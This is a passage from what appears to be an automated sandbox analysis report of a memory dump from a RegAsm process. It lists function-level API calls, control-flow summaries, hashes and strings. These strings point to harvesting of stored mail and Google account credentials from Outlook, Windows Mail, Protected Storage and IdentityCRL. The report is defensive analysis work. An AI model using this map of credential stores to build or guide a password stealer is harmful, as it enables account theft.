                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                      • API String ID: 910260487-375988210
                                                                                                                                                                                                                      • Opcode ID: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                                                      Function 00403C16 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 184libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad_mbscpy
                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                      • API String ID: 3151552205-317895162
                                                                                                                                                                                                                      • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                                                      Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 262 444c4a-444c66 call 444e38 GetModuleHandleA 265 444c87-444c8a 262->265 266 444c68-444c73 262->266 268 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 265->268 266->265 267 444c75-444c7e 266->267 269 444c80-444c85 267->269 270 444c9f-444ca3 267->270 277 444d02-444d0d __setusermatherr 268->277 278 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 268->278 269->265 272 444c8c-444c93 269->272 270->265 273 444ca5-444ca7 270->273 272->265 275 444c95-444c9d 272->275 276 444cad-444cb0 273->276 275->276 276->268 277->278 281 444da4-444da7 278->281 282 444d6a-444d72 278->282 285 444d81-444d85 281->285 286 444da9-444dad 281->286 283 444d74-444d76 282->283 284 444d78-444d7b 282->284 283->282 283->284 284->285 287 444d7d-444d7e 284->287 288 444d87-444d89 285->288 289 444d8b-444d9c GetStartupInfoA 285->289 286->281 287->285 288->287 288->289 290 444d9e-444da2 289->290 291 444daf-444db1 289->291 292 444db2-444dc6 GetModuleHandleA call 40cf44 290->292 291->292 295 444dcf-444e0f _cexit call 444e71 292->295 296 444dc8-444dc9 exit 292->296 296->295
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID: 2t
                                                                                                                                                                                                                      • API String ID: 3662548030-3527913779
                                                                                                                                                                                                                      • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                                                                                                                      Function 0040FB00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 300 40fb00-40fb35 call 44b090 RegOpenKeyExA 303 40fc37-40fc3d 300->303 304 40fb3b-40fb4f 300->304 306 40fb55-40fb7e RegQueryValueExA 304->306 307 40fc2d-40fc31 RegCloseKey 304->307 308 40fc23-40fc27 RegCloseKey 306->308 309 40fb84-40fb93 call 404734 306->309 307->303 308->307 309->308 312 40fb99-40fbd1 call 4047a5 309->312 312->308 315 40fbd3-40fbdb 312->315 316 40fc19-40fc1d LocalFree 315->316 317 40fbdd-40fc14 memcpy * 2 call 40f802 315->317 316->308 317->316
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                                                      • API String ID: 547501411-2409096184
                                                                                                                                                                                                                      • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                                                      Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 319 402c5d-402c81 call 410a9c 322 402da5-402db0 319->322 323 402c87-402cb7 memset call 410b62 319->323 326 402d9c-402d9f RegCloseKey 323->326 327 402cbd-402cbf 323->327 326->322 328 402cc4-402d2d call 410b1e memset sprintf call 410a9c 327->328 333 402d3a-402d6b sprintf call 410a9c 328->333 334 402d2f-402d35 call 402bd1 328->334 338 402d7a-402d8a call 410b62 333->338 339 402d6d-402d75 call 402bd1 333->339 334->333 342 402d8f-402d94 338->342 339->338 342->328 343 402d9a-402d9b 342->343 343->326
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                        • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                      • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                      • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                                      • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                                                      Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                      • API String ID: 1502082548-2578778931
                                                                                                                                                                                                                      • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                                                      Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 365 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 370 40f5c3-40f5ea RegQueryValueExA 365->370 371 40f6d9-40f6df 365->371 372 40f6d0-40f6d3 RegCloseKey 370->372 373 40f5f0-40f5f4 370->373 372->371 373->372 374 40f5fa-40f604 373->374 375 40f606-40f618 call 40466b call 404734 374->375 376 40f677 374->376 385 40f66a-40f675 call 404785 375->385 386 40f61a-40f63e call 4047a5 375->386 377 40f67a-40f67d 376->377 377->372 379 40f67f-40f6bf call 4012ee RegQueryValueExA 377->379 379->372 387 40f6c1-40f6cf 379->387 385->377 386->385 392 40f640-40f643 386->392 387->372 393 40f661-40f664 LocalFree 392->393 394 40f645-40f65a memcpy 392->394 393->385 394->393
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4271961475-3916222277
                                                                                                                                                                                                                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                                                      Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 395 4037ca-40381c memset * 2 call 444551 398 4038e2-4038e5 395->398 399 403822-403882 call 4021b6 call 406f06 * 2 strchr 395->399 406 403884-403895 _mbscpy 399->406 407 403897-4038a2 strlen 399->407 408 4038bf-4038dd _mbscpy call 4023e5 406->408 407->408 409 4038a4-4038bc sprintf 407->409 408->398 409->408
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                      • API String ID: 317221925-3288273942
                                                                                                                                                                                                                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                                                                      Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                      • String ID: %s@gmail.com
                                                                                                                                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                                                      Function 00404A99 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 3897320386-317687271
                                                                                                                                                                                                                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                      Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040351A
